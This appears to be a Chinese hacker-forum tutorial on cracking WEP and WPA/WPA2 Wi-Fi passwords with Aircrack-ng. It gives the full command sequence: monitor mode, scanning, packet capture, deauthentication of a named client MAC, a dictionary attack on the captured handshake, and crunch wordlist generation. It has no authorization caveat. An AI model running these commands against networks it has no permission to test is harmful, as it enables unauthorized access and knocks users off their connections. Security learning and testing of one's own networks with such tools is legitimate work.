搜索
查看: 4691|回复: 0

使用 Aircrack-ng 破解 WEP 和 WPA/WPA2 加密的 Wi-Fi 密码

[复制链接]

152

主题

99

回帖

540

积分

高级会员

中国黑客

积分
540
QQ
发表于 2018-6-2 13:07:54 | 显示全部楼层 |阅读模式 来自 甘肃陇南
[pre]
iwconfig
[/pre]
#确认网卡信息。

[pre]
airmon-ng start wlan0
[/pre]
#激活网卡至监视模式。

[pre]
airodump-ng wlan0mon
[/pre]
#获取附近AP 信息。

这里解释几个参数:
BSSID(Basic Service SetIdentifier): AP 的MAC 地址。
ESSID(The Extended Service Set Identifier): AP 的名称。
PWR(Power): 信号强度。
Beacons: AP发出的通告编号,每个接入点(AP)在最低速率(1M)时差不多每秒会发送10个左右的beacon,所以它们能在很远的地方就被发现。
#Data:当前数据传输量。
#/s:过去10秒钟内每秒捕获数据分组的数量。
CH(Channel): AP 所在的频道。
MB: AP 的最大传输速度。MB=11 => 802.11b,MB=22 => 802.11b+, MB>22 => 802.11g。后面带.的表示短封包标头,处理速度快,更利于破解。
ENC(Encryption): 使用的加密算法体系。
CIPHER: 检测到的加密算法。#这个和ENC 的区别我确实不明白,有没有知道的朋友可以告诉我。
AUTH(Authority): 认证方式。
Elapsed: 用过的时间。

记录 TEST-jglimmers 的 MAC 地址(BSSID),频道(CH)。

BSSID: 88:25:93:5A:B5:6A
CH: 1
[pre]
airodump-ng --ivs -w 文件地址 --bssid BSSID wlan0mon #开始抓包, -w(write) 抓到的包保存的位置
[/pre]

[pre]
aireplay-ng -0 10 -a 88:25:93:5A:B5:6A -c 68:17:29:26:C3:16 wlan0mon
[/pre]
#如果发现像我一样得到的数据较少可尝试发送数据包


当经过第2 步发送大量数据包之后只要发现第1 步中右上角出现了 handshake: AP的MAC(BSSID),就可以 CRTL+C 停止。

[pre]
aircrack-ng -w Wordlists.txt CAP-01.cap
[/pre]
#-w表示字典包的路径, CAP 表示第 1 步中保存的文件中 -01.cap

这样等待破解成功即可!
这里给大家推荐一个密码生成工具 Crunch
如:要生成0-9之间的密码,执行命令

[pre]
crunch 8 8 0123456789 -o /root/pass.txt
[/pre]


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?注册

×
谁有敬业福啊!
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表